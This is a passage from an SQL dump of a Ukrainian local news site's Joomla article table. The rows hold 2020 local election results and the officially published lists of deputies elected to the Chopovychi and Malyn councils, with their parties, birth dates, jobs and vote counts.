які взяли участь у голосуванні 25.10.2020 року, віддали свій голос за Ситайла Олександра Григоровича','5293-vibortsi-iz-11164-yaki-vzyali-uchast-u-golosuvanni-25-10-2020-roku-viddali-svij-golos-za-sitajla-oleksandra-grigorovicha','<p><img src=\"https://malehus.in.ua/images/stories/mer.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></p>','',1,8,'2020-10-29 16:38:57',430,'','2020-10-29 16:38:57',0,0,'0000-00-00 00:00:00','2020-10-29 16:38:57','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,32,'','',1,648,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2485,2906,'Вартість природного газу в листопаді 2020 року в розрізі постачальників','vartist-prirodnogo-gazu-v-listopadi-2020-roku-v-rozrizi-postachalnikiv','<p><img src=\"https://malehus.in.ua/images/stories/gaz11_20.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></p><p>за матеріалами&nbsp;<a href=\"https://gazpravda.com.ua/\">https://gazpravda.com.ua/</a></p>','',1,8,'2020-10-31 10:59:40',430,'','2020-10-31 10:59:40',0,0,'0000-00-00 00:00:00','2020-10-31 10:59:40','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,31,'','',1,447,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2486,2907,'Депутати Чоповицької селищної ради ','deputati-chopovitskoji-selishchnoji-radi','<table><tbody><tr><td><p>','Висування    (назва політичної партії, місцева організація якої висунула кандидата, або    самовисування)</p></td><td><p>Кількість обраних    депутатів</p></td><td><p>%</p></td></tr><tr><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>16</p></td><td><p>72.73</p></td></tr><tr><td><p>ПОЛІТИЧНА ПАРТІЯ \"СЛУГА НАРОДУ\"</p></td><td><p>2</p></td><td><p>9.09</p></td></tr><tr><td><p>ПОЛІТИЧНА ПАРТІЯ \"ЄВРОПЕЙСЬКА СОЛІДАРНІСТЬ\"</p></td><td><p>2</p></td><td><p>9.09</p></td></tr><tr><td><p>Самовисування</p></td><td><p>1</p></td><td><p>4.55</p></td></tr><tr><td><p>політична партія Всеукраїнське об’єднання    \"Батьківщина\"</p></td><td><p>1</p></td><td><p>4.55</p></td></tr></tbody></table><br><table><tbody><tr><td><p>№ ОВО</p></td><td><p>Прізвище, ім\'я, по    батькові</p></td><td><p>Висування</p></td><td><p>Відомості про обраного    депутата</p></td></tr><tr><td><p>1</p></td><td><p>Дєньгаєва Ніна Олександрівна</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянка України, народилася 13.06.1963    р., освіта середня спеціальна, безпартійна, Чоповицька селищна рада,    Секретар, місце проживання: с-ще Чоповичі, Малинський р-н,Житомирська обл</p></td></tr><tr><td><p>1</p></td><td><p>Косинський Володимир Іванович</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянин України, народився 05.04.1989    р., освіта вища, безпартійний, Чоповицька селищна рада, Начальник відділу,    місце проживання: с-ще Чоповичі, Малинський р-н,Житомирська обл</p></td></tr><tr><td><p>1</p></td><td><p>Харченко Сергій Миколайович</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянин України, народився 01.01.1977 р., освіта вища,    безпартійний, ДП\"Малинський ЛГ АПК\", Лісничий, місце проживання:    с-ще Чоповичі, Малинський р-н, Житомирська обл</p></td></tr><tr><td><p>2</p></td><td><p>Раєць Віктор Володимирович</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянин України, народився 14.03.1979 р., освіта вища,    безпартійний, КНП\"Чоповицький центр медико-санітарної допомоги\",    Головний лікар, місце проживання: с-ще Чоповичі, Малинський р-н,Житомирська    обл</p></td></tr><tr><td><p>2</p></td><td><p>Філоненко Михайло Миколайович</p></td><td><p>ПОЛІТИЧНА ПАРТІЯ \"СЛУГА НАРОДУ\"</p></td><td><p>Громадянин України, народився 22.11.1982    р., освіта вища, безпартійний, Верховна Рада України, Помічник-консультант    народного депутата України Грищенко Т.М., місце проживання: м. Малин,    Малинський р-н,Житомирська обл..</p></td></tr><tr><td><p>2</p></td><td><p>Філоненко Оксана Олександрівна</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянка України, народилася 02.10.1980    р., освіта середня спеціальна, безпартійна, ФОП\"Філоненко О.О.\",    місце проживання: с-ще Чоповичі, Малинський р-н,Житомирська обл</p></td></tr><tr><td><p>2</p></td><td><p>Шпакович Валентина Василівна</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянка України, народилася 20.07.1968 р., освіта середня    спеціальна, безпартійна, Чоповицька селищна рада, Спеціаліст відділу    кадрового і правового забезпечення, місце проживання: с-ще Чоповичі,    Малинський р-н,Житомирська обл</p></td></tr><tr><td><p>3</p></td><td><p>Дученко Крістіна Володимирівна</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянка України, народилася 02.12.1993    р., освіта загальна середня, безпартійна, Перукарня \"Kristina\", Перукар, місце проживання: С.Загребля    Малинський р-н,Житомирська обл</p></td></tr><tr><td><p>3</p></td><td><p>Шпакович Тетяна Іванвна</p></td><td><p>ПОЛІТИЧНА ПАРТІЯ \"ЄВРОПЕЙСЬКА СОЛІДАРНІСТЬ\"</p></td><td><p>Громадянка України, народилася 25.09.1978    р., освіта вища, безпартійна, Будинок культури с.Барвінки, Завідуюча, місце    проживання: с.Новобратське,Малинський р-н,Житомирська обл.</p></td></tr><tr><td><p>4</p></td><td><p>Недашківська Людмила Миколаївна</p></td><td><p>ПОЛІТИЧНА ПАРТІЯ \"СЛУГА НАРОДУ\"</p></td><td><p>Громадянка України, народилася 05.11.1971    р., освіта вища, безпартійна, Чоповицька селищна рада, Староста, місце    проживання: с. Новобратське, Малинський р-н, Житомирська обл..</p></td></tr><tr><td><p>4</p></td><td><p>Фещенко Михайло Іванович</p></td><td><p>Самовисування</p></td><td><p>Громадянин України, народився 04.01.1956    р., освіта середня спеціальна, безпартійний, пенсіонер, місце проживання:    с.Барвінки,Малинський р-н,Житомирська обл..</p></td></tr><tr><td><p>5</p></td><td><p>Александрук Микола Володимирович</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянин України, народився 19.06.1960    р., освіта вища, безпартійний, пенсіонер, місце проживання:    с.Йосипівка,Малинський р-н,Житомирська обл..</p></td></tr><tr><td><p>5</p></td><td><p>Мойсієнко Микола Миколайович</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянин України, народився 30.04.1960    р., освіта середня спеціальна, безпартійний, ТОВ ФНК \"Ельфа\",    Інженер з охорони праці, місце проживання: с-ще Чоповичі,Малинський    р-н,Житомирська обл..</p></td></tr><tr><td><p>5</p></td><td><p>Петровський Аркадій Петрович</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянин України, народився 20.07.1967 р., освіта вища,    безпартійний, Йосипівська ЗОШ, Директор, місце проживання:    с.Йосипівка,Малинський р-н,Житомирська обл..</p></td></tr><tr><td><p>5</p></td><td><p>Шоботенко Олександр Володимирович</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянин України, народився 18.09.1968 р., освіта середня    спеціальна, безпартійний, ДП\"Малинський ЛГ АПК\", Майстер лісу,    місце проживання: с.Йосипівка,Малинський р-н,Житомирська обл..</p></td></tr><tr><td><p>6</p></td><td><p>Майстренко Тетяна Іванівна</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянка України, народилася 30.07.1970    р., освіта загальна середня, безпартійна, ФОП\"Майстренко Т.І.\",    місце проживання: с.Тишів,Малинський р-н,Житомирська обл..</p></td></tr><tr><td><p>6</p></td><td><p>Ярошенко В’ячеслав Петрович</p></td><td><p>політична партія Всеукраїнське об’єднання    \"Батьківщина\"</p></td><td><p>Громадянин України, народився 01.01.1974    р., освіта вища, безпартійний, Фермерське господарство \"Слава    Полісся\", Голова, місце проживання: м.Малин,Житомирська обл..</p></td></tr><tr><td><p>7</p></td><td><p>Дударенко Ірина Рустемівна</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянка України, народилася 08.04.1973    р., освіта середня спеціальна, безпартійна, Скуратівська сільська рада,    Секретар, місце проживання: с. Скурати,Малинський р-н,Житомирська обл..</p></td></tr><tr><td><p>7</p></td><td><p>Кондратчук Галина Павлівна</p></td><td><p>ПОЛІТИЧНА ПАРТІЯ \"ЄВРОПЕЙСЬКА СОЛІДАРНІСТЬ\"</p></td><td><p>Громадянка України, народилася 21.06.1962    р., освіта вища, безпартійна, ПОСП \" Скуратівське\", директор, місце    проживання: с.Скурати,Малинський р-н,Житомирська обл..</p></td></tr><tr><td><p>7</p></td><td><p>Романчук Олександр Васильович</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянин України, народився 10.05.1983    р., освіта вища, безпартійний, Владівська ЗОШ, Директор, місце проживання:    с.Владівка, Малинський р-н,Житомирська обл..</p></td></tr><tr><td><p>8</p></td><td><p>Закусило Віта Валентинівна</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянка України, народилася 24.06.1994    р., освіта вища, безпартійна, Головківський ДНЗ, Вихователь, місце    проживання: с.Головки,Малинський р-н,Житомирська обл.</p></td></tr><tr><td><p>8</p></td><td><p>Олександрук Світлана Миколаївна</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянка України, народилася 10.10.1968    р., освіта середня спеціальна, безпартійна, Головківська ЗОШ, Вчитель, місце    проживання: с.Головки,Малинський р-н,Житомирська обл..</p></td></tr></tbody></table><p><br></p>',1,8,'2020-11-03 14:56:23',430,'','2020-12-16 12:49:18',430,0,'0000-00-00 00:00:00','2020-11-03 14:56:23','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,30,'','',1,354,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2487,2908,'Депутати Малинської міської ради ','deputati-malinskoji-miskoji-radi','	<p>Коростенський р-н, Малинська міська рада</p><table><tbody><tr><td><p>Кількість депутатів місцевої ради, які    обираються на відповідних виборах</p></td><td><p>34</p></td></tr><tr><td><p>Кількість обраних депутатів місцевої ради</p></td><td><p>34</p></td></tr></tbody></table><br>','<p><img class=\"fr-dii fr-fin\"><!--[if !vml]--> Загальні відомості про результати голосування</p><table><tbody><tr><td><p>Назва    політичної партії, місцева організація якої висунула кандидатів у депутати</p></td><td><p>К-сть    голосів, поданих за місцеву організацію політичної партії</p></td><td><p>К-сть    отриманих депутатських мандатів</p></td></tr><tr><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>4472</p></td><td><p>16</p></td></tr><tr><td><p>політична партія Всеукраїнське об’єднання    \"Батьківщина\"</p></td><td><p>1252</p></td><td><p>5</p></td></tr><tr><td><p>ПОЛІТИЧНА ПАРТІЯ \"ЄВРОПЕЙСЬКА СОЛІДАРНІСТЬ\"</p></td><td><p>1157</p></td><td><p>5</p></td></tr><tr><td><p>ПОЛІТИЧНА ПАРТІЯ \"СЛУГА НАРОДУ\"</p></td><td><p>896</p></td><td><p>4</p></td></tr><tr><td><p>Політична партія \"Перемога Пальчевського\"</p></td><td><p>778</p></td><td><p>4</p></td></tr><tr><td><p>ПОЛІТИЧНА ПАРТІЯ \"ПРОПОЗИЦІЯ\"</p></td><td><p>461</p></td><td><p>0</p></td></tr><tr><td><p>ПОЛІТИЧНА ПАРТІЯ \"ОПОЗИЦІЙНА    ПЛАТФОРМА – ЗА ЖИТТЯ\"</p></td><td><p>376</p></td><td><p>0</p></td></tr><tr><td><p>ПОЛІТИЧНА ПАРТІЯ \"ЗА МАЙБУТНЄ\"</p></td><td><p>329</p></td><td><p>0</p></td></tr><tr><td><p>Політична партія \"Радикальна Партія    Олега Ляшка\"</p></td><td><p>190</p></td><td><p>0</p></td></tr><tr><td><p>Політична Партія \"ГОЛОС\"</p></td><td><p>186</p></td><td><p>0</p></td></tr><tr><td><p>політична партія Всеукраїнське об’єднання    \"Свобода\"</p></td><td><p>154</p></td><td><p>0</p></td></tr><tr><td><p>Політична партія \"Ліва опозиція\"</p></td><td><p>102</p></td><td><p>0</p></td></tr><tr><td><p>ПОЛІТИЧНА ПАРТІЯ    \"ГРОМАДСЬКО-ПОЛІТИЧНА ПЛАТФОРМА НАДІЇ САВЧЕНКО\"</p></td><td><p>94</p></td><td><p>0</p></td></tr></tbody></table><p><img class=\"fr-dii fr-fin\"><!--[if !vml]--> Відомості про обраних депутатів місцевої ради</p><table><tbody><tr><td><p>Назва    політичної партії, місцева організація якої висунула кандидатів у депутати</p></td><td><p>Кількість обраних    депутатів</p></td><td><p>Відсоток    від загального складу ради</p></td></tr><tr><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>16</p></td><td><p>47.06</p></td></tr><tr><td><p>ПОЛІТИЧНА ПАРТІЯ \"ЄВРОПЕЙСЬКА СОЛІДАРНІСТЬ\"</p></td><td><p>5</p></td><td><p>14.71</p></td></tr><tr><td><p>політична партія Всеукраїнське об’єднання    \"Батьківщина\"</p></td><td><p>5</p></td><td><p>14.71</p></td></tr><tr><td><p>ПОЛІТИЧНА ПАРТІЯ \"СЛУГА НАРОДУ\"</p></td><td><p>4</p></td><td><p>11.76</p></td></tr><tr><td><p>Політична партія \"Перемога Пальчевського\"</p></td><td><p>4</p></td><td><p>11.76</p></td></tr></tbody></table><p><br></p><table><tbody><tr><td><p>№ ТВО, за яким    закріплено</p></td><td><p>Прізвище, ім’я, по    батькові</p></td><td><p>Відомості про обраного    депутата</p></td><td><p>Голосів ЗА</p></td><td><p>% від квоти</p></td><td><p>Виборчий    округ, в якому обрано</p></td></tr><tr><td><p>політична партія Всеукраїнське об’єднання    \"Батьківщина\"</p></td></tr><tr><td><p>Перший кандидат</p></td><td><p>Шостак Олексій Григорович</p></td><td><p>Громадянин України, народився 14.08.1976 р., освіта вища, член    політичної партії Всеукраїнське об’єднання \"Батьківщина\",    Виконавчий комітет Малинської міської ради, Міський голова, місце проживання:    м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>1</p></td><td><p>Сніцаренко Леся Андріївна</p></td><td><p>Громадянка України, народилася 20.06.1977 р., освіта вища,    член політичної партії Всеукраїнське об’єднання \"Батьківщина\",    Виконавчий комітет Малинської міської ради, Заступник міського голови, місце    проживання: м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>26</p></td><td><p>8,81</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>1</p></td><td><p>Старжинський Ігор Олександрович</p></td><td><p>Громадянин України, народився 05.05.1992 р., освіта вища, член    політичної партії Всеукраїнське об’єднання \"Батьківщина\", ФОП    \"Старжинський\", Директор, місце проживання: м. Малин, Коростенський    р-н, Житомирська обл.</p></td><td><p>48</p></td><td><p>16,27</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>1</p></td><td><p>Столяр Олександр Васильович</p></td><td><p>Громадянин України, народився 19.06.1960 р., освіта середня    спеціальна, член політичної партії Всеукраїнське об’єднання    \"Батьківщина\", ФОП \"Столяр\", Директор, місце проживання: м.    Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>111</p></td><td><p>37,62</p></td><td><p>1</p></td></tr><tr><td><p>2</p></td><td><p>Сербін Валентин Іванович</p></td><td><p>Громадянин України, народився 28.12.1974    р., освіта вища, безпартійний, Житлово-комунальне господарство, Інспектор з    благоустрою, місце проживання: с. Нова Діброва, Коростенський р-н,    Житомирська обл.</p></td><td><p>67</p></td><td><p>22,71</p></td><td><p>2</p></td></tr><tr><td><p>ПОЛІТИЧНА    ПАРТІЯ \"ЄВРОПЕЙСЬКА СОЛІДАРНІСТЬ\"</p></td></tr><tr><td><p>Перший кандидат</p></td><td><p>Насіканова Марія Іванівна</p></td><td><p>Громадянка України, народилася 05.08.1958    р., освіта вища, член ПОЛІТИЧНОЇ ПАРТІЇ \"ЄВРОПЕЙСЬКА СОЛІДАРНІСТЬ\",    пенсіонер, місце проживання: м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>1</p></td><td><p>Хоменко Віктор Васильович</p></td><td><p>Громадянин України, народився 21.10.1972    р., освіта вища, безпартійний, ТОВ \"Папір-Мал\", директор, місце    проживання: м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>46</p></td><td><p>15,59</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>1</p></td><td><p>Будник Марія Миколаївна</p></td><td><p>Громадянка України, народилася 08.07.1973    р., освіта вища, член ПОЛІТИЧНОЇ ПАРТІЇ \"ЄВРОПЕЙСЬКА СОЛІДАРНІСТЬ\",    тимчасово не працює, місце проживання: м. Малин, Коростенський р-н,    Житомирська обл.</p></td><td><p>106</p></td><td><p>35,93</p></td><td><p>1</p></td></tr><tr><td><p>2</p></td><td><p>Мельник Олег Васильович</p></td><td><p>Громадянин України, народився 29.08.1984    р., освіта вища, член ПОЛІТИЧНОЇ ПАРТІЇ \"ЄВРОПЕЙСЬКА СОЛІДАРНІСТЬ\",    ТОВ \"Екогран\",, головний енергетик, місце проживання: м. Малин,    Коростенський р-н, Житомирська обл.</p></td><td><p>97</p></td><td><p>32,88</p></td><td><p>2</p></td></tr><tr><td><p>3</p></td><td><p>Малегус Ігор Євгенович</p></td><td><p>Громадянин України, народився 16.04.1969    р., освіта вища, безпартійний, Малинська райрада, керуючий справами, місце    проживання: м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>61</p></td><td><p>20,67</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>Політична    партія \"НАШ КРАЙ\"</p></td></tr><tr><td><p>Перший кандидат</p></td><td><p>Дмитренко Дмитро Васильович</p></td><td><p>Громадянин України, народився 28.01.1977    р., освіта вища, член Політичної партії \"НАШ КРАЙ\", ТОВ    \"Тандем\", Директор, місце проживання: м. Малин, Коростенський р-н,    Житомирська обл.</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>1</p></td><td><p>Приходько Ольга Василівна</p></td><td><p>Громадянка України, народилася 20.11.1967    р., освіта вища, безпартійна, Консультативно- діагностична поліклініка,    Завідуюча, місце проживання: м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>20</p></td><td><p>6,77</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>1</p></td><td><p>Гуцалюк Ольга Михайлівна</p></td><td><p>Громадянка України, народилася 26.06.1958    р., освіта загальна середня, безпартійна, ТОВ \"Малин Енергоінвест\",    Оператор насосної станції, місце проживання: м. Малин, Коростенський р-н,    Житомирська обл.</p></td><td><p>100</p></td><td><p>33,89</p></td><td><p>1</p></td></tr><tr><td><p>1</p></td><td><p>Лукашенко Віталій Анатолійович</p></td><td><p>Громадянин України, народився 05.04.1976    р., освіта вища, безпартійний, Фабрика банкнотного паперу Національного банку    України, Головний спеціаліст відділу супроводження інформаційних систем,    місце проживання: м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>132</p></td><td><p>44,74</p></td><td><p>1</p></td></tr><tr><td><p>1</p></td><td><p>Карпенко Сергій Васильович</p></td><td><p>Громадянин України, народився 21.07.1982 р., освіта вища, член    Політичної партії \"НАШ КРАЙ\", Малинське районне комунальне    підприємство з технічної інвентаризації, Начальник, місце проживання: м.    Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>164</p></td><td><p>55,59</p></td><td><p>1</p></td></tr><tr><td><p>1</p></td><td><p>Ситайло Олександр Григорович</p></td><td><p>Громадянин України, народився 17.08.1986    р., освіта вища, безпартійний, КП \"Екоресурс\", Директор, місце    проживання: м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>527</p></td><td><p>178,64</p></td><td><p>1</p></td></tr><tr><td><p>2</p></td><td><p>Костюченко Лариса Миколаївна</p></td><td><p>Громадянка України, народилася 28.09.1971    р., освіта вища, безпартійна, Малинський професійно- технічний ліцей,    Заступник директора, місце проживання: м. Малин, Коростенський р-н,    Житомирська обл.</p></td><td><p>48</p></td><td><p>16,27</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>2</p></td><td><p>Рудицька Олеся Ростиславівна</p></td><td><p>Громадянка України, народилася 19.06.1975    р., освіта вища, безпартійна, Малинського правління ОСББ \"Дружня    оселя\", Голова, місце проживання: м. Малин, Коростенський р-н,    Житомирська обл.</p></td><td><p>123</p></td><td><p>41,69</p></td><td><p>2</p></td></tr><tr><td><p>2</p></td><td><p>Сафранчук Сергій Петрович</p></td><td><p>Громадянин України, народився 19.10.1966    р., освіта вища, член Політичної партії \"НАШ КРАЙ\", ТОВ    \"Юнігран\", Заступник генерального директора, місце проживання: с.    Пиріжки, Коростенський р-н, Житомирська обл.</p></td><td><p>132</p></td><td><p>44,74</p></td><td><p>2</p></td></tr><tr><td><p>2</p></td><td><p>Лісовський Юрій Володимирович</p></td><td><p>Громадянин України, народився 14.12.1967    р., освіта вища, безпартійний, ТОВ \"Юнігран\", Начальник    дробарно-сортувальної дільниці, місце проживання: м. Малин, Коростенський    р-н, Житомирська обл.</p></td><td><p>163</p></td><td><p>55,25</p></td><td><p>2</p></td></tr><tr><td><p>3</p></td><td><p>Ліпей Надія Володимирівна</p></td><td><p>Громадянка України, народилася 02.07.1970    р., освіта середня спеціальна, безпартійна, Компанія \"Юнігран\",    Завідуюча складами, місце проживання: с. Українка, Коростенський р-н,    Житомирська обл.</p></td><td><p>207</p></td><td><p>70,16</p></td><td><p>3</p></td></tr><tr><td><p>3</p></td><td><p>Євдокименко Валерій Петрович</p></td><td><p>Громадянин України, народився 01.02.1970    р., освіта вища, безпартійний, ТОВ \"Юнігран\", Головний енергетик,    місце проживання: смт Гранітне, Коростенський р-н, Житомирська обл.</p></td><td><p>215</p></td><td><p>72,88</p></td><td><p>3</p></td></tr><tr><td><p>3</p></td><td><p>Кашиця В’ячеслав Михайлович</p></td><td><p>Громадянин України, народився 23.11.1962    р., освіта вища, безпартійний, ПМП \"Полісся\", Генеральний директор,    місце проживання: с. Забране, Коростенський р-н, Житомирська обл.</p></td><td><p>217</p></td><td><p>73,55</p></td><td><p>3</p></td></tr><tr><td><p>4</p></td><td><p>Савченко Микола Іванович</p></td><td><p>Громадянин України, народився 28.08.1962    р., освіта вища, безпартійний, АТ \"Коростенський кар’єр\", Заступник    начальника з гірничого цеху, місце проживання: м. Коростень, Коростенський    р-н, Житомирська обл.</p></td><td><p>201</p></td><td><p>68,13</p></td><td><p>4</p></td></tr><tr><td><p>4</p></td><td><p>Гончаренко Галина Аркадіївна</p></td><td><p>Громадянка України, народилася 16.05.1967    р., освіта вища, безпартійна, Любовицька сільська рада, Бухгалтер, місце    проживання: с. Любовичі, Коростенський р-н, Житомирська обл.</p></td><td><p>233</p></td><td><p>78,98</p></td><td><p>4</p></td></tr><tr><td><p>4</p></td><td><p>Гаєвський Петро Петрович</p></td><td><p>Громадянин України, народився 29.05.1986    р., освіта вища, безпартійний, Малинського ДП \"Лісгосп АПК\",    Директор, місце проживання: м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>237</p></td><td><p>80,33</p></td><td><p>4</p></td></tr><tr><td><p>Політична    партія \"Перемога Пальчевського\"</p></td></tr><tr><td><p>Перший кандидат</p></td><td><p>Парфіненко Наталія Юріївна</p></td><td><p>Громадянка України, народилася 31.08.1987    р., освіта вища, безпартійна, Малинівська сільська рада Малинського району,    Сільський голова, місце проживання: м. Малин, Коростенський р-н, Житомирська    обл.</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>1</p></td><td><p>Кисельчук Дмитрій Васильович</p></td><td><p>Громадянин України, народився 09.08.1981    р., освіта вища, безпартійний, Тимчасово не працює, місце проживання: м.    Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>37</p></td><td><p>12,54</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>2</p></td><td><p>Войтюк Оксана Романівна</p></td><td><p>Громадянка України, народилася 08.11.1968    р., освіта вища, безпартійна, ТОВ \"СВІТ-КОНСАЛТ\", Головний    бухгалтер, місце проживання: м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>20</p></td><td><p>6,77</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>3</p></td><td><p>Лазарчук Людмила Анатоліївна</p></td><td><p>Громадянка України, народилася 17.02.1969    р., освіта вища, безпартійна, Тимчасово не працює, місце проживання: с.    Федорівка, Малинський р-н, Житомирська обл.</p></td><td><p>59</p></td><td><p>20,00</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>ПОЛІТИЧНА    ПАРТІЯ \"СЛУГА НАРОДУ\"</p></td></tr><tr><td><p>Перший кандидат</p></td><td><p>Рудченко Юрій Миколайович</p></td><td><p>Громадянин України, народився 04.05.1981 р., освіта вища,    безпартійний, Фізична особа-підприємець, місце проживання: м. Житомир,    Житомирська обл.</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>1</p></td><td><p>Майстренко Василь Петрович</p></td><td><p>Громадянин України, народився 06.01.1982    р., освіта вища, безпартійний, АТ Житомиробленерго, юрист, місце проживання:    м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>26</p></td><td><p>8,81</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>2</p></td><td><p>Грищенко Вячеслав Миколайович</p></td><td><p>Громадянин України, народився 17.07.1979    р., освіта вища, безпартійний, пенсіонер, місце проживання: м. Малин,    Коростенський р-н, Житомирська обл.</p></td><td><p>33</p></td><td><p>11,18</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>2</p></td><td><p>Бенчук Андрій Леонідович</p></td><td><p>Громадянин України, народився 11.05.1991    р., освіта вища, безпартійний, Державна Екологічна інспекція Поліського    округу, Інспектор з ОНПС, місце проживання: м. Малин, Коростенський р-н,    Житомирська обл.</p></td><td><p>39</p></td><td><p>13,22</p></td><td><p>2</p></td></tr></tbody></table><p><br></p>',1,8,'2020-11-08 18:31:46',430,'','2020-12-16 12:48:19',430,0,'0000-00-00 